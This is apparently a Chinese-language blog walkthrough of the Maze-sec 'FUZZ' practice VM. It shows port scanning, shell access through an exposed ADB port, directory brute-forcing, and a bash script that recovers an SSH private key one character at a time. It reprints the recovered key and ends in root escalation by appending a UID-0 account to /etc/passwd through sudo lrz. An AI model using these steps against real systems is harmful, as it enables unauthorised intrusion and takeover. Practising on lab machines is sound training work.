FUZZ靶机复盘

一. 信息收集

1.1 端口扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿kali)-[~]
└─# nmap -A -sV -sS -p- 192.168.215.243
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 04:08 EDT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 04:08 (0:00:00 remaining)
Nmap scan report for 192.168.215.243
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey: 
|   256 b6:7b:e7:e5:b3:33:c7:ff:db:63:5d:b3:75:0d:e2:dd (ECDSA)
|_  256 0a:ce:e5:c3:de:50:9c:6d:b7:0d:de:73:b8:6c:28:55 (ED25519)
5555/tcp open  adb     Android Debug Bridge (token auth required)
MAC Address: 08:00:27:65:B9:E7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.66 ms 192.168.215.243

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.24 seconds

扫描到了22和5555端口(ADB 是 Android 开发工具包中的调试工具,用于通过 USB 或网络连接与 Android 设备通信)

在kali里面默认是没有adb的,安装一下adb的,需要安装一下

1
2
sudo apt update
sudo apt install adb
1.2 Adb的使用:

连接设备:

1
adb connect <device_ip_address>:5555

检查设备连接:

1
adb devices

设备信息:

1
adb shell

发现了两个用户,其中asahi权限不足,不能进入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~/zuoti]
└─# adb connect 192.168.215.243:5555
connected to 192.168.215.243:5555

┌──(root㉿kali)-[~/zuoti]
└─# adb devices
List of devices attached
192.168.215.243:5555	device


┌──(root㉿kali)-[~/zuoti]
└─# adb shell
/ $ id 
uid=1000(runner) gid=1000(runner) groups=1000(runner)
/ $ cd /home;ls 
asahi   runner
/home $ whoami 
runner

查看网络连接,发现了靶机本地内有个80端口开放,需要使用chisel进行端口转发

1
2
3
4
5
6
7
8
9
/ $ netstat -lnutp
netstat: showing only processes with your user ID 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN      2563/python3
tcp        0      0 :::22                   :::*                    LISTEN      -

二.Chisel端口转发

把Chisel传到靶机中(详细命令 请看chisel工具的使用)

三.getshell

curl 一下没有内容,爆破一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

┌──(root?kali)-[~]
└─# curl http://192.168.215.222:1111

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.215.222:1111 -w  /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.215.222:1111
[+] Method:                  GET
[+] Threads:                 60
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/line                 (Status: 200) [Size: 0]
/line2                (Status: 200) [Size: 0]
/line1                (Status: 200) [Size: 0]
/line3                (Status: 200) [Size: 0]
/line4                (Status: 200) [Size: 0]
/line01               (Status: 200) [Size: 0]
/line02               (Status: 200) [Size: 0]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.215.222:1111/line -w  /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.215.222:1111/line
[+] Method:                  GET
[+] Threads:                 60
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/b                    (Status: 200) [Size: 0]
/b3                   (Status: 200) [Size: 0]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

然后就没什么思路了,去看了一眼wp,发现通过爆破会产生一个私钥,那么就写脚本进行爆破一下,再次之前现生成一个base64的字典(私钥是base64里面的字符组成)

echo {a..z} {A..Z} {0..9} + / = |tr “ “ “\n” >base64.txt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/bash
for s in `seq 5`  #私钥有5行,line正好到line5再往后就有报错信息了
do
key=""
for k in $(seq 70)  #私钥一行是70个字符
do
    for i in $(cat base64.txt)
    do
        tmp="$key$i"  #把私钥进行拼接
        a=$(curl -s "http://192.168.215.222:1111/line${s}/${tmp}")
        [ -z "$a" ] && key="$tmp" && break
    done
done
echo  "$key"
done

解释如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[~]
└─# curl http://192.168.215.222:1111/line6
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

┌──(root㉿kali)-[~]
└─# curl http://192.168.215.222:1111/line5
┌──(root㉿kali)-[~]
└─# curl http://192.168.215.222:1111/line5

┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa |head -3
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA4gzpxutA/zy7lBPOK1C6if7717eJSyh4KYYigwXGzzjRddQJt8Mb

┌──(root㉿kali)-[~/.ssh]
└─# echo -n "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn" |wc -c
70

脚本爆破完毕:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~/zuoti_demo]
└─# bash ida
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=

┌──(root㉿kali)-[~/zuoti_demo]
└─# cat id2    #要把私钥写成这样的形式
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----


ssh登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[~/zuoti_demo]
└─# ssh-keygen -y -f id2
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id2' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id2": bad permissions

┌──(root㉿kali)-[~/zuoti_demo]
└─# chmod 600 id2


┌──(root㉿kali)-[~/zuoti_demo]
└─# ssh-keygen -y -f id2   # 从 id2(私钥) 中可以看见公钥(只是看一下)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICucQUWuMMjqti3kaZQPEy9J5felyfQYYF+CjURC1emD asahi@phi

┌──(root㉿kali)-[~/zuoti_demo]
└─# ssh asahi@192.168.215.243 -i id2  #使用私钥进行连接(这个进行连接)

fuzzz:~$

四. SUDO提权

发现了SUDO的文件可以利用,进行提权

1
2
3
4
5
6
7
fuzzz:~$ sudo -l
Matching Defaults entries for asahi on fuzzz:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asahi:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User asahi may run the following commands on fuzzz:
    (ALL) NOPASSWD: /usr/local/bin/lrz

lrz可以在windows上打开一个窗口,进行上传文件,也可以在靶机上进行追加文件的操作

思路:制作一个UID=0的用户(自己知道密码openssl制作),追加到passwd的文件下,ssh进行连接即可获得root的权限

1
sudo  lrz  -+          
1
2
3
4
5
6
7
8
9
10
11
12
13
fuzzz:~$ cd /etc
fuzzz:/etc$ 
fuzzz:/etc$ 
fuzzz:/etc$ sudo  lrz  -+

fuzzz:/etc$ cat passwd|tail -5
runner:x:1000:1000::/home/runner:/bin/sh
asahi:x:1001:1001::/home/asahi:/bin/sh
uwsgi:x:101:102:uwsgi:/dev/null:/sbin/nologin

bbb:$1$XcOxYpYr$TrEv26VvyGK2Su/vHasbF1:0:0:root:/root:/bin/sh
fuzzz:/etc$

使用ssh进行连接bbb用户,提权成功。

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~]
└─# ssh bbb@192.168.215.243 
bbb@192.168.215.243's password: 

fuzzz:~# id
uid=0(root) gid=0(root) groups=0(root)
fuzzz:~#

Maze-sec靶机系列
#复盘
FUZZ靶机复盘
http://example.com/2025/05/23/FUZZ靶机复盘/
作者
XCDH
发布于
2025年5月23日
许可协议